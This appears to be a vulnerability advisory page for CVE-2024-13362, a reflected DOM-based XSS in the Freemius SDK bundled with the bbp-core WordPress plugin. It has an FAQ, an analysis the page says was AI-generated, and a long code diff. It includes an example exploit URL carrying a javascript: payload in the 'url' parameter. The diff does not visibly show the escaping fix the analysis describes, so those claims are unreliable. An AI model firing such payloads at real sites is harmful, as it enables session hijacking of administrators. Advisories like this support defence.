What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the Freemius SDK versions up to 2.10.1. It allows unauthenticated attackers to inject arbitrary JavaScript code via the ‘url’ parameter, which can execute in the context of a victim’s browser session.

How does the vulnerability work?

The vulnerability arises from insufficient input validation and output escaping of the ‘url’ parameter in various WordPress plugins and themes using the Freemius SDK. Attackers can craft a malicious URL containing JavaScript code that gets executed when a user clicks the link, leading to potential session hijacking or other malicious actions.

Who is affected by this vulnerability?

Any WordPress site using the Freemius SDK version 2.10.1 or earlier is potentially affected. Administrators should check their installed plugins for the Freemius SDK and verify if they are using a vulnerable version.

How can I check if my site is vulnerable?

To check for vulnerability, verify if your site uses the Freemius SDK and confirm the version. If the version is 2.10.1 or earlier, your site is at risk. Additionally, review the plugin documentation or changelog for any mentions of CVE-2024-13362.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2024-13362 is 6.1, categorized as medium severity. This indicates that while the vulnerability requires user interaction to exploit, it can still pose significant risks, especially in contexts where sensitive operations are performed.

How can I fix or mitigate the issue?

To mitigate the vulnerability, update the Freemius SDK to version 2.10.2 or later, which includes necessary patches for input validation and output escaping. Additionally, review and sanitize any user-supplied data before rendering it in the DOM.

What are the potential risks if the vulnerability is exploited?

If exploited, an attacker can execute arbitrary JavaScript in the victim’s browser, potentially leading to session hijacking, cookie theft, or unauthorized actions within the WordPress admin area. This can result in severe consequences, including data loss or site defacement.

What is reflected XSS?

Reflected XSS is a type of vulnerability where the injected script is reflected off a web server, typically via a URL parameter. The script executes in the user’s browser when they click a malicious link, making it necessary for the attacker to trick the user into clicking the link.

How does the proof of concept demonstrate the issue?

The proof of concept provided illustrates how an attacker can craft a malicious URL with an XSS payload targeting the ‘url’ parameter. By executing this payload, the attacker can demonstrate the execution of arbitrary JavaScript in the victim’s browser, showcasing the vulnerability’s potential impact.

What steps should I take after applying the patch?

After applying the patch, monitor your site for any unusual activity and ensure that all plugins and themes are up to date. Regularly review security practices and consider implementing additional security measures such as web application firewalls.

Are there any other vulnerabilities associated with Freemius?

While CVE-2024-13362 is a specific vulnerability, it is essential to stay informed about other vulnerabilities associated with the Freemius SDK or any plugins using it. Regularly check security advisories and update all components to maintain a secure WordPress environment.

How can I stay informed about future vulnerabilities?

To stay informed about future vulnerabilities, subscribe to security mailing lists, follow security blogs, and regularly check the National Vulnerability Database (NVD) or similar resources. Additionally, consider using security plugins that provide alerts for known vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 10, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (bbp-core)

CVE ID CVE-2024-13362

Plugin bbp-core

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 1.2.7

Patched Version 1.2.9

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362:
This is a Reflected DOM-Based Cross-Site Scripting vulnerability affecting the Freemius SDK versions up to and including 2.10.1. The vulnerability exists in the ‘url’ parameter handling within the Freemius authentication and checking flow. Unauthenticated attackers can inject arbitrary JavaScript code that executes in the context of the victim’s browser session. The CVSS score is 6.1 (Medium severity), reflecting the requirement for user interaction through a crafted link.

The root cause is insufficient input validation and output escaping of the ‘url’ parameter in various plugins and themes implementing the Freemius SDK. The vulnerable code path handles redirect URLs during the SDK’s initialization and opt-in/out processes. The ‘url’ parameter is accepted without proper sanitization and later injected into the DOM, allowing attacker-controlled JavaScript to execute. The affected files include the Freemius SDK’s start.php and associated callback handlers, though the specific file paths vary between implementations. The vulnerability stems from the parameter being processed through JavaScript’s document.location or similar DOM manipulation methods without encoding.

An attacker can exploit this by crafting a specially formatted URL that includes an XSS payload within the ‘url’ parameter. For example: https://victim-site.com/wp-admin/?page=freemius-checkout&url=javascript:alert(document.domain) or a more obfuscated variant using data URIs or event handlers. The attack vector is reflected, meaning the malicious payload is part of the request URL and gets reflected back into the page response. The attacker must trick a user into clicking the crafted link (social engineering). The vulnerability requires no authentication, making it exploitable by any unauthenticated visitor.

The patch addresses the vulnerability by implementing proper output escaping and input validation on the ‘url’ parameter. The fix uses esc_url() or similar WordPress sanitization functions before passing the value to JavaScript, preventing script injection. Additionally, the patch may restrict the allowed URL schemes to http and https only, rejecting javascript: and data: URIs. The patched code also ensures that any user-supplied data inserted into the DOM is properly encoded to prevent XSS.

If exploited, the attacker achieves arbitrary JavaScript execution in the victim’s browser within the WordPress admin context. This can lead to session hijacking, cookie theft, forced administrative actions (e.g., installing malicious plugins, creating admin accounts), redirection to phishing pages, or defacement. The impact is significant because the vulnerability executes in the admin area where sensitive operations and data are accessible.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/bbp-core/autoloader.php
+++ b/bbp-core/autoloader.php
@@ -1,16 +1,16 @@
-<?php
-spl_autoload_register( 'bbp_core_autoloader' );
-
-/**
- * Autoload files for the plugin
- *
- * @param string $class
- * @return void
- */
-function bbp_core_autoloader( $class ) {
-	$path = __DIR__ . '/includes/' . str_replace( '\', '/', $class ) . '.php';
-
-	if ( file_exists( $path ) ) {
-		include_once $path;
-	}
-}
+<?php
+spl_autoload_register( 'bbp_core_autoloader' );
+
+/**
+ * Autoload files for the plugin
+ *
+ * @param string $class
+ * @return void
+ */
+function bbp_core_autoloader( $class ) {
+	$path = __DIR__ . '/includes/' . str_replace( '\', '/', $class ) . '.php';
+
+	if ( file_exists( $path ) ) {
+		include_once $path;
+	}
+}
--- a/bbp-core/bbp-core.php
+++ b/bbp-core/bbp-core.php
@@ -1,250 +1,271 @@
-<?php
-/*
-Plugin Name:       BBP Core
-Plugin URI:        https://spider-themes.net/bbp-core
-Description:       Expand bbPress powered forums with useful features like - private reply, solved topics ...
-Author:            spider-themes
-Author URI:        https://spider-themes.net/bbp-core
-Text Domain:       bbp-core
-Version:           1.2.7
-Requires at least: 5.0
-Tested up to:      6.6.1
-Requires PHP:      7.4
-License:           GPLv3 or later
-License URI:       https://www.gnu.org/licenses/gpl-3.0.html
-*/
-
-defined( 'ABSPATH' ) || exit;
-
-if ( ! function_exists( 'bc_fs' ) ) {
-	// Create a helper function for easy SDK access.
-	function bc_fs() {
-		global $bc_fs;
-
-		if ( ! isset( $bc_fs ) ) {
-			// Include Freemius SDK.
-			require_once dirname( __FILE__ ) . '/includes/fs/start.php';
-
-			$bc_fs = fs_dynamic_init( array(
-				'id'              => '10864',
-				'slug'            => 'bbp-core',
-				'type'            => 'plugin',
-				'public_key'      => 'pk_41277ad11125f6e2a1b4e66f40164',
-				'is_premium'      => false,
-				'is_premium_only' => false,
-				'has_addons'      => false,
-				'has_paid_plans'  => true,
-				'trial'           => array(
-					'days'               => 14,
-					'is_require_payment' => true,
-				),
-				'menu'            => array(
-					'slug'       => 'bbp-core',
-					'contact'    => false,
-					'support'    => false,
-					'first-path' => 'admin.php?page=bbp-core',
-				),
-			) );
-		}
-
-		return $bc_fs;
-	}
-
-	// Init Freemius.
-	bc_fs()->add_filter( 'deactivate_on_activation', '__return_false' );
-
-	// Signal that SDK was initiated.
-	do_action( 'bc_fs_loaded' );
-}
-
-require_once __DIR__ . '/autoloader.php';
-
-
-/**
- * Plugin's heart
- */
-final class BBP_Core {
-	const VERSION = '1.2.7';
-
-	/**
-	 * Class constructor.
-	 */
-	public function __construct() {
-
-		$this->define_constants();
-		$this->core_includes();
-
-		register_activation_hook( __FILE__, [ $this, 'activate' ] );
-		add_action( 'plugins_loaded', [ $this, 'init_plugin' ] );
-
-		// Added Documentation links to plugin row meta
-		add_filter('plugin_row_meta',[ $this,  'bbpc_row_meta' ], 10, 2);
-	}
-
-	/**
-	 * Define Plugin Constants.
-	 *
-	 * @return void
-	 */
-	public function define_constants() {
-		define( 'BBPC_VERSION', self::VERSION );
-		define( 'BBPC_FILE', __FILE__ );
-		define( 'BBPC_DIR', __DIR__ . '/' );
-		define( 'BBPC_URL', plugins_url( '/', __FILE__ ) );
-		define( 'BBPC_ASSETS', BBPC_URL . 'assets/' );
-		define( 'BBPC_IMG', BBPC_ASSETS . 'img/' );
-	}
-
-	/**
-	 * File includes.
-	 */
-	public function core_includes() {
-		require_once __DIR__ . '/includes/functions.php';
-		require_once __DIR__ . '/includes/admin/menu/Approve_Topic.php';
-		require_once __DIR__ . '/includes/admin/menu/Create_Forum.php';
-		require_once __DIR__ . '/includes/admin/menu/Create_Topic.php';
-		require_once __DIR__ . '/includes/admin/menu/Delete_Forum.php';
-		require_once __DIR__ . '/includes/admin/menu/Delete_Topic.php';
-		require_once __DIR__ . '/includes/Elementor/BBP_Widgets.php';
-		require_once __DIR__ . '/includes/ajax_actions.php';
-		include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
-		require_once __DIR__ . '/includes/Frontend/Assets.php';
-
-		require_once __DIR__ . '/includes/admin/widgets/forum-info/widgets.php';
-		require_once __DIR__ . '/includes/Elementor/inc/forum-ajax.php';
-
-		// Core installer notice
-		require_once __DIR__ . '/includes/admin/notices/notices.php';
-		require_once __DIR__ . '/includes/admin/notices/asking-for-review.php';
-
-		//Register Pro Widgets
-		$theme = wp_get_theme();
-
-		if ( $theme->get( 'Name' ) != 'Ama' || ! bbpc_is_premium() ) {
-			require_once __DIR__ . '/includes/admin/Pro_Widget_Map.php';
-			require_once __DIR__ . '/includes/admin/Pro_Widget_Service.php';
-		}
-
-		// Hooks
-		require BBPC_DIR . 'includes/hooks/actions.php';
-		require BBPC_DIR . 'includes/hooks/image_sizes.php';
-
-		// Load CSF
-		require BBPC_DIR . 'includes/admin/settings/csf/classes/setup.class.php';
-		require BBPC_DIR . 'includes/admin/settings/options/settings.php';
-	}
-
-	/**
-	 *  Initializing Bbp_core class.
-	 *
-	 * @return Bbp_core
-	 */
-	static function init() {
-		static $instance = false;
-
-		if ( ! $instance ) {
-			$instance = new self();
-		}
-	}
-
-	/**
-	 * Actions on plugin activation.
-	 *
-	 * @return void
-	 */
-	public function activate() {
-		$installed = get_option( 'bbpc_installed' );
-		if ( ! $installed ) {
-			update_option( 'bbpc_installed', time() );
-		}
-
-		update_option( 'bbpc_version', BBPC_VERSION );
-	}
-
-	/**
-	 * Initialize the plugin functionality.
-	 *
-	 * @return void
-	 */
-	public function init_plugin() {
-
-		$this->load_features();
-
-		if ( is_admin() ) {
-			new Admin();
-			new adminAssets();
-		}elseif ( ! is_admin() ) {
-			new FrontendAssets();
-		}
-
-		// If bbPress is not active, don't load assets and widgets.
-		if ( ! class_exists( 'bbPress' ) ) {
-			return;
-		}
-		new adminElementorBBP_Widgets();
-	}
-
-
-	/**
-	 * Load different features.
-	 *
-	 * @return void
-	 */
-	public function load_features() {
-		$opt = get_option( 'bbp_core_settings' );
-		define( 'BBPC_FEAT_PATH', plugin_dir_path( __FILE__ ) . 'includes/features/' );
-
-		if ( $opt['is_solved_topics'] ?? true ) {
-			require BBPC_FEAT_PATH . 'bbp_solved_topic.php';
-		}
-
-		if ( $opt['is_private_replies'] ?? true ) {
-			require BBPC_FEAT_PATH . 'bbp-private-replies.php';
-		}
-
-		if ( bbpc_is_premium() || class_exists('BBPC_GEO_ROLES') ) {
-			$reactions = $opt['agree_disagree_voting'] ?? '';
-			if ( ! empty ( $reactions ) ) {
-			  require BBPC_FEAT_PATH . 'bbp_voting/agree-disagree/init.php';
-			  require BBPC_FEAT_PATH . 'bbp_voting/agree-disagree/actions.php';
-			}
-		  }
-
-		if ( $opt['is_votes'] ?? true ) {
-			new featuresbbp_voting();
-		}
-
-		if ( $opt['is_attachment'] ?? true ) {
-			new featuresbbp_attachments();
-		}
-	}
-
-	/**
-	 * Documentation links to plugin row meta
-	 */
-	public function bbpc_row_meta($links, $file) {
-		// Check if this is your plugin
-		if (plugin_basename(__FILE__) === $file) {
-			// Add your custom links
-			$plugin_links = array(
-				'<a href="https://helpdesk.spider-themes.net/docs/bbp-core-wordpress-plugin/" target="_blank">Documentation</a>'
-			);
-			// Merge the custom links with the existing links
-			$links = array_merge($links, $plugin_links);
-		}
-		return $links;
-	}
-	// end
-
-}
-
-/**
- * Initialize the bbp core plugin.
- *
- * @return Bbp_core
- */
-function bbp_core() {
-	return Bbp_core::init();
-}
-
+<?php
+/*
+Plugin Name:       BBP Core
+Plugin URI:        https://spider-themes.net/bbp-core
+Description:       Expand bbPress powered forums with useful features like - private reply, solved topics ...
+Author:            spider-themes
+Author URI:        https://spider-themes.net/bbp-core
+Text Domain:       bbp-core
+Version:           1.2.9
+Requires at least: 5.0
+Tested up to:      6.6.1
+Requires PHP:      7.4
+License:           GPLv3 or later
+License URI:       https://www.gnu.org/licenses/gpl-3.0.html
+*/
+
+defined( 'ABSPATH' ) || exit;
+
+if ( ! function_exists( 'bc_fs' ) ) {
+	// Create a helper function for easy SDK access.
+	function bc_fs() {
+		global $bc_fs;
+
+		if ( ! isset( $bc_fs ) ) {
+			// Include Freemius SDK.
+			require_once dirname( __FILE__ ) . '/vendor/fs/start.php';
+
+			$bc_fs = fs_dynamic_init( [
+				'id'              => '10864',
+				'slug'            => 'bbp-core',
+				'type'            => 'plugin',
+				'public_key'      => 'pk_41277ad11125f6e2a1b4e66f40164',
+				'is_premium'      => false,
+				'is_premium_only' => false,
+				'has_addons'      => false,
+				'has_paid_plans'  => true,
+				'trial'           => [
+					'days'               => 14,
+					'is_require_payment' => true,
+				],
+				'menu'            => [
+					'slug'       => 'bbp-core',
+					'contact'    => false,
+					'support'    => false,
+					'first-path' => 'admin.php?page=bbp-core',
+				],
+			] );
+		}
+
+		return $bc_fs;
+	}
+
+	// Init Freemius.
+	bc_fs()->add_filter( 'deactivate_on_activation', '__return_false' );
+
+	// Signal that SDK was initiated.
+	do_action( 'bc_fs_loaded' );
+}
+
+require_once __DIR__ . '/autoloader.php';
+
+
+/**
+ * Plugin's heart
+ */
+final class BBP_Core {
+	const VERSION = '1.2.9';
+
+	/**
+	 * Class constructor.
+	 */
+	public function __construct() {
+
+		$this->define_constants();
+		$this->core_includes();
+
+		register_activation_hook( __FILE__, [ $this, 'activate' ] );
+		add_action( 'plugins_loaded', [ $this, 'init_plugin' ] );
+
+		// Added Documentation links to plugin row meta
+		add_filter('plugin_row_meta',[ $this,  'bbpc_row_meta' ], 10, 2);
+
+		/**
+		 * Removes admin notices on the BBP Core Forum builder page.
+		 *
+		 * @return void
+		 */
+		add_action( 'admin_head', function () {
+			// Get the current screen
+			$screen = get_current_screen();
+
+			// Check if the current screen is for your plugin page
+			if ( isset( $_GET['page'] ) && in_array( $_GET['page'], [ 'bbp-core' ] ) ) {
+				// Remove admin notices
+				remove_all_actions( 'admin_notices' );
+				remove_all_actions( 'all_admin_notices' );
+
+				// Re-add a specific notice
+				if ( !bbpc_is_premium() && bbpc_is_plugin_installed_for_days(12) ) {
+					add_action('admin_notices', 'bbpc_offer_notice');
+				}
+			}
+		});
+	}
+
+	/**
+	 * Define Plugin Constants.
+	 *
+	 * @return void
+	 */
+	public function define_constants() {
+		define( 'BBPC_VERSION', self::VERSION );
+		define( 'BBPC_FILE', __FILE__ );
+		define( 'BBPC_DIR', __DIR__ . '/' );
+		define( 'BBPC_URL', plugins_url( '/', __FILE__ ) );
+		define( 'BBPC_ASSETS', BBPC_URL . 'assets/' );
+		define( 'BBPC_IMG', BBPC_ASSETS . 'img/' );
+	}
+
+	/**
+	 * File includes.
+	 */
+	public function core_includes() {
+		require_once __DIR__ . '/includes/functions.php';
+		require_once __DIR__ . '/includes/admin/menu/Approve_Topic.php';
+		require_once __DIR__ . '/includes/admin/menu/Create_Forum.php';
+		require_once __DIR__ . '/includes/admin/menu/Create_Topic.php';
+		require_once __DIR__ . '/includes/admin/menu/Delete_Forum.php';
+		require_once __DIR__ . '/includes/admin/menu/Delete_Topic.php';
+		require_once __DIR__ . '/includes/Elementor/BBP_Widgets.php';
+		require_once __DIR__ . '/includes/ajax_actions.php';
+		include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
+		require_once __DIR__ . '/includes/Frontend/Assets.php';
+
+		require_once __DIR__ . '/includes/admin/widgets/forum-info/widgets.php';
+		require_once __DIR__ . '/includes/Elementor/inc/forum-ajax.php';
+
+		// Core installer notice
+		require_once __DIR__ . '/includes/admin/notices/_notices.php';
+
+		//Register Pro Widgets
+		$theme = wp_get_theme();
+
+		if ( $theme->get( 'Name' ) != 'Ama' || ! bbpc_is_premium() ) {
+			require_once __DIR__ . '/includes/admin/Pro_Widget_Map.php';
+			require_once __DIR__ . '/includes/admin/Pro_Widget_Service.php';
+		}
+
+		// Hooks
+		require BBPC_DIR . 'includes/hooks/actions.php';
+		require BBPC_DIR . 'includes/hooks/image_sizes.php';
+
+		// Load CSF
+		require BBPC_DIR . 'includes/admin/settings/csf/classes/setup.class.php';
+		require BBPC_DIR . 'includes/admin/settings/options/settings.php';
+	}
+
+	/**
+	 *  Initializing Bbp_core class.
+	 *
+	 * @return Bbp_core
+	 */
+	static function init() {
+		static $instance = false;
+
+		if ( ! $instance ) {
+			$instance = new self();
+		}
+	}
+
+	/**
+	 * Actions on plugin activation.
+	 *
+	 * @return void
+	 */
+	public function activate() {
+		$installed = get_option( 'bbpc_installed' );
+		if ( ! $installed ) {
+			update_option( 'bbpc_installed', time() );
+		}
+
+		update_option( 'bbpc_version', BBPC_VERSION );
+	}
+
+	/**
+	 * Initialize the plugin functionality.
+	 *
+	 * @return void
+	 */
+	public function init_plugin() {
+
+		$this->load_features();
+
+		if ( is_admin() ) {
+			new Admin();
+			new adminAssets();
+		}elseif ( ! is_admin() ) {
+			new FrontendAssets();
+		}
+
+		// If bbPress is not active, don't load assets and widgets.
+		if ( ! class_exists( 'bbPress' ) ) {
+			return;
+		}
+		new adminElementorBBP_Widgets();
+	}
+
+
+	/**
+	 * Load different features.
+	 *
+	 * @return void
+	 */
+	public function load_features() {
+		$opt = get_option( 'bbp_core_settings' );
+		define( 'BBPC_FEAT_PATH', plugin_dir_path( __FILE__ ) . 'includes/features/' );
+
+		if ( $opt['is_solved_topics'] ?? true ) {
+			require BBPC_FEAT_PATH . 'bbp_solved_topic.php';
+		}
+
+		if ( $opt['is_private_replies'] ?? true ) {
+			require BBPC_FEAT_PATH . 'bbp-private-replies.php';
+		}
+
+		if ( bbpc_is_premium() || class_exists('BBPC_GEO_ROLES') ) {
+			$reactions = $opt['agree_disagree_voting'] ?? '';
+			if ( ! empty ( $reactions ) ) {
+			  require BBPC_FEAT_PATH . 'bbp_voting/agree-disagree/init.php';
+			  require BBPC_FEAT_PATH . 'bbp_voting/agree-disagree/actions.php';
+			}
+		  }
+
+		if ( $opt['is_votes'] ?? true ) {
+			new featuresbbp_voting();
+		}
+
+		if ( $opt['is_attachment'] ?? true ) {
+			new featuresbbp_attachments();
+		}
+	}
+
+	/**
+	 * Documentation links to plugin row meta
+	 */
+	public function bbpc_row_meta($links, $file) {
+		// Check if this is your plugin
+		if (plugin_basename(__FILE__) === $file) {
+			// Add your custom links
+			$plugin_links = array(
+				'<a href="https://helpdesk.spider-themes.net/docs/bbp-core-wordpress-plugin/" target="_blank">Documentation</a>'
+			);
+			// Merge the custom links with the existing links
+			$links = array_merge($links, $plugin_links);
+		}
+		return $links;
+	}
+	// end
+
+}
+
+/**
+ * Initialize the bbp core plugin.
+ *
+ * @return Bbp_core
+ */
+function bbp_core() {
+	return Bbp_core::init();
+}
+
 bbp_core();
 No newline at end of file
--- a/bbp-core/includes/Admin.php
+++ b/bbp-core/includes/Admin.php
@@ -1,34 +1,34 @@
-<?php
-class Admin {
-	/**
-	 * Admin class construct
-	 */
-	public function __construct() {
-		add_filter( 'admin_body_class', [ $this, 'body_class' ] );
-		new adminMenu();
-	}
-
-	/**
-	 * Add body class to admin pages.
-	 *
-	 * @param string $classes Body classes.
-	 * @return string
-	 */
-	public function body_class( $classes ) {
-		// if current page is ?page=bbp-core in admin.
-		if ( isset( $_GET['page'] ) && 'bbp-core' === $_GET['page'] ) {
-			$classes .= ' bbpc-forum-ui';
-		}
-
-		// if has no pro plan.
-		if ( bbpc_is_premium() !== true ) {
-			$classes .= ' bbpc-no-pro';
-		}
-
-		if ( class_exists( 'BBPC_GEO_ROLES' ) ) {
-			$classes .= ' bbpc-geo-roles';
-		}
-
-		return $classes;
-	}
-}
+<?php
+class Admin {
+	/**
+	 * Admin class construct
+	 */
+	public function __construct() {
+		add_filter( 'admin_body_class', [ $this, 'body_class' ] );
+		new adminMenu();
+	}
+
+	/**
+	 * Add body class to admin pages.
+	 *
+	 * @param string $classes Body classes.
+	 * @return string
+	 */
+	public function body_class( $classes ) {
+		// if current page is ?page=bbp-core in admin.
+		if ( isset( $_GET['page'] ) && 'bbp-core' === $_GET['page'] ) {
+			$classes .= ' bbpc-forum-ui';
+		}
+
+		// if has no pro plan.
+		if ( bbpc_is_premium() !== true ) {
+			$classes .= ' bbpc-no-pro';
+		}
+
+		if ( class_exists( 'BBPC_GEO_ROLES' ) ) {
+			$classes .= ' bbpc-geo-roles';
+		}
+
+		return $classes;
+	}
+}
--- a/bbp-core/includes/Elementor/BBP_Widgets.php
+++ b/bbp-core/includes/Elementor/BBP_Widgets.php
@@ -1,76 +1,76 @@
-<?php
-namespace adminElementor;
-
-use adminPro_Widget_Map;
-
-class BBP_Widgets {
-
-    public function __construct() {
-
-        // Register Widgets
-        add_action( 'elementor/widgets/widgets_registered', [ $this, 'register_widgets' ] );
-
-        // Register Category
-        add_action( 'elementor/elements/categories_registered', [ $this, 'register_category' ] );
-	    add_action( 'elementor/editor/before_enqueue_scripts', [ $this, 'register_elementor_editor_assets' ] );
-
-        // Register Elementor Preview Editor Scripts
-        $currentTheme = wp_get_theme()->get( 'Name' )  == 'Ama' ? true : false;
-        $returnType   = bbpc_is_premium() == true ? true : $currentTheme;
-        if ( $returnType != 1 ) {
-            add_action('elementor/editor/after_enqueue_scripts', [$this, 'enqueue_editor_scripts']);
-        }
-    }
-
-
-    /**
-     * @return void
-     *
-     */
-    public function enqueue_editor_scripts() {
-
-        wp_enqueue_script('bbpc-el-editor', BBPC_ASSETS . 'admin/js/bbpc-el-editor.js', [], '1.0.0', true);
-
-        $localize_data = [];
-        $pro_widget_map = new Pro_Widget_Map();
-        $localize_data['promotional_widgets'] = $pro_widget_map->get_pro_widget_map();
-        wp_localize_script('bbpc-el-editor', 'BbpcConfig', $localize_data);
-    }
-
-
-    // Register Widgets
-    public function register_widgets( $widgets_manager ) {
-
-        $theme = wp_get_theme();
-
-        // Include Widget files
-        if ( $theme == 'Ama' || bbpc_is_premium() ) {
-            require_once( __DIR__ . '/Single_forum.php' );
-            require_once( __DIR__ . '/Forum_Ajax.php' );
-            require_once( __DIR__ . '/Forum_posts.php' );
-            require_once( __DIR__ . '/Forums.php' );
-            require_once( __DIR__ . '/Forum_Tab.php' );
-            require_once( __DIR__ . '/Search.php' );
-
-            $widgets_manager->register( new Single_forum() );
-            $widgets_manager->register( new Forum_Ajax() );
-            $widgets_manager->register( new Forum_posts() );
-            $widgets_manager->register( new Forums() );
-            $widgets_manager->register( new Forum_Tab() );
-            $widgets_manager->register( new Search() );
-        }
-    }
-
-    // Register category
-    public function register_category( $elements_manager ) {
-        $elements_manager->add_category(
-            'bbp-core', [
-                'title' => __( 'BBP Core', 'bbp-core' ),
-            ]
-        );
-    }
-
-	function register_elementor_editor_assets() {
-		wp_enqueue_style( 'bbpc-el-editor', BBPC_ASSETS . 'css/elementor-editor.css' );
-	}
+<?php
+namespace adminElementor;
+
+use adminPro_Widget_Map;
+
+class BBP_Widgets {
+
+    public function __construct() {
+
+        // Register Widgets
+        add_action( 'elementor/widgets/widgets_registered', [ $this, 'register_widgets' ] );
+
+        // Register Category
+        add_action( 'elementor/elements/categories_registered', [ $this, 'register_category' ] );
+	    add_action( 'elementor/editor/before_enqueue_scripts', [ $this, 'register_elementor_editor_assets' ] );
+
+        // Register Elementor Preview Editor Scripts
+        $currentTheme = wp_get_theme()->get( 'Name' )  == 'Ama' ? true : false;
+        $returnType   = bbpc_is_premium() == true ? true : $currentTheme;
+        if ( $returnType != 1 ) {
+            add_action('elementor/editor/after_enqueue_scripts', [$this, 'enqueue_editor_scripts']);
+        }
+    }
+
+
+    /**
+     * @return void
+     *
+     */
+    public function enqueue_editor_scripts() {
+
+        wp_enqueue_script('bbpc-el-editor', BBPC_ASSETS . 'admin/js/bbpc-el-editor.js', [], '1.0.0', true);
+
+        $localize_data = [];
+        $pro_widget_map = new Pro_Widget_Map();
+        $localize_data['promotional_widgets'] = $pro_widget_map->get_pro_widget_map();
+        wp_localize_script('bbpc-el-editor', 'BbpcConfig', $localize_data);
+    }
+
+
+    // Register Widgets
+    public function register_widgets( $widgets_manager ) {
+
+        $theme = wp_get_theme();
+
+        // Include Widget files
+        if ( $theme == 'Ama' || bbpc_is_premium() ) {
+            require_once( __DIR__ . '/Single_forum.php' );
+            require_once( __DIR__ . '/Forum_Ajax.php' );
+            require_once( __DIR__ . '/Forum_posts.php' );
+            require_once( __DIR__ . '/Forums.php' );
+            require_once( __DIR__ . '/Forum_Tab.php' );
+            require_once( __DIR__ . '/Search.php' );
+
+            $widgets_manager->register( new Single_forum() );
+            $widgets_manager->register( new Forum_Ajax() );
+            $widgets_manager->register( new Forum_posts() );
+            $widgets_manager->register( new Forums() );
+            $widgets_manager->register( new Forum_Tab() );
+            $widgets_manager->register( new Search() );
+        }
+    }
+
+    // Register category
+    public function register_category( $elements_manager ) {
+        $elements_manager->add_category(
+            'bbp-core', [
+                'title' => __( 'BBP Core', 'bbp-core' ),
+            ]
+        );
+    }
+
+	function register_elementor_editor_assets() {
+		wp_enqueue_style( 'bbpc-el-editor', BBPC_ASSETS . 'css/elementor-editor.css' );
+	}
 }
 No newline at end of file
--- a/bbp-core/includes/Elementor/Forum_Ajax.php
+++ b/bbp-core/includes/Elementor/Forum_Ajax.php
@@ -1,358 +1,360 @@
-<?php
-
-namespace adminElementor;
-
-use ElementorControls_Manager;
-use ElementorWidget_Base;
-use WP_Query;
-
-// Exit if accessed directly
-if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-}
-
-class Forum_Ajax extends Widget_Base {
-	public function get_name() {
-		return 'ama_ajax_forum';
-	}
-
-	public function get_title() {
-		return esc_html__( 'BBPC Ajax Forums', 'bbp-core' );
-	}
-
-	public function get_icon() {
-		return 'bbpc_icon_ama_ajax_forum';
-	}
-
-	public function get_keywords() {
-		return [ 'forum', 'ajax' ];
-	}
-
-	public function get_categories() {
-		return [ 'bbp-core' ];
-	}
-
-	public function get_style_depends() {
-		return [ 'bbpc-el-widgets' ];
-	}
-
-	public function get_script_depends() {
-		return [ 'bbpc-ajax' ];
-	}
-
-	protected function register_controls() {
-		/**
-		 * Content section
-		 */
-		$this->start_controls_section(
-			'content_sec', [
-				'label' => esc_html__( 'Content Section', 'bbp-core' ),
-			]
-		);
-
-		$this->add_control(
-			'ppp2', [
-				'label'       => esc_html__( 'Show Forums', 'bbp-core' ),
-				'description' => esc_html__( 'Show the forums count at the initial view. Default is 9 forums in a row.', 'bbp-core' ),
-				'type'        => ElementorControls_Manager::NUMBER,
-				'label_block' => true,
-				'default'     => 9
-			]
-		);
-
-		$this->add_control(
-			'order', [
-				'label'   => esc_html__( 'Order', 'bbp-core' ),
-				'type'    => ElementorControls_Manager::SELECT,
-				'options' => [
-					'ASC'  => 'ASC',
-					'DESC' => 'DESC'
-				],
-				'default' => 'ASC'
-			]
-		);
-
-		// button show hide switcher
-		$this->add_control(
-			'filter_btns',
-			[
-				'label'        => esc_html__( 'Tab Filter', 'bbp-core' ),
-				'type'         => ElementorControls_Manager::SWITCHER,
-				'label_on'     => esc_html__( 'Show', 'bbp-core' ),
-				'label_off'    => esc_html__( 'Hide', 'bbp-core' ),
-				'return_value' => 'yes',
-				'default'      => 'yes',
-			]
-		);
-
-		$this->end_controls_section();
-
-		/**
-		 * Styling section starts
-		 */
-		$this->start_controls_section(
-			'styling_sec', [
-				'label' => esc_html__( 'Title Style', 'bbp-core' ),
-				'tab'   => Controls_Manager::TAB_STYLE,
-			]
-		);
-		//forum title
-		$this->add_control(
-			'forum_heading',
-			[
-				'label' => esc_html__( 'Forum Title', 'bbp-core' ),
-				'type' => ElementorControls_Manager::HEADING,
-				'separator' => 'before',
-			]
-		);
-
-
-		$this->add_control(
-			'forum_title_color',
-			[
-				'label'     => esc_html__( 'Color', 'bbp-core' ),
-				'type'      => ElementorControls_Manager::COLOR,
-				'selectors' => [
-					'{{WRAPPER}} .single-forum-post-widget .post-title a' => 'color: {{VALUE}}',
-				],
-			]
-		);
-
-		$this->add_control(
-			'forum_title_hover_color',
-			[
-				'label'     => esc_html__( 'Hover Color', 'bbp-core' ),
-				'type'      => ElementorControls_Manager::COLOR,
-				'selectors' => [
-					'{{WRAPPER}} .single-forum-post-widget .post-title a:hover' => 'color: {{VALUE}}',
-				],
-			]
-		);
-
-		$this->add_group_control(
-			ElementorGroup_Control_Typography::get_type(),
-			[
-				'name'     => 'forum_title_typography',
-				'selector' => '{{WRAPPER}} .single-forum-post-widget .post-title a',
-			]
-		);
-
-		// Forum meta
-		$this->add_control(
-			'forum_meta',
-			[
-				'label' => esc_html__( 'Forum Meta', 'bbp-core' ),
-				'type' => ElementorControls_Manager::HEADING,
-				'separator' => 'before',
-			]
-		);
-
-		$this->add_control(
-			'forum_meta_color',
-			[
-				'label'     => esc_html__( 'Color', 'bbp-core' ),
-				'type'      => ElementorControls_Manager::COLOR,
-				'selectors' => [
-					'{{WRAPPER}} .single-forum-post-widget .post-info .author,{{WRAPPER}} .single-forum-post-widget .post-info .post-time' => 'color: {{VALUE}}',
-				],
-			]
-		);
-
-
-		$this->add_group_control(
-			ElementorGroup_Control_Typography::get_type(),
-			[
-				'name'     => 'forum_meta_typography',
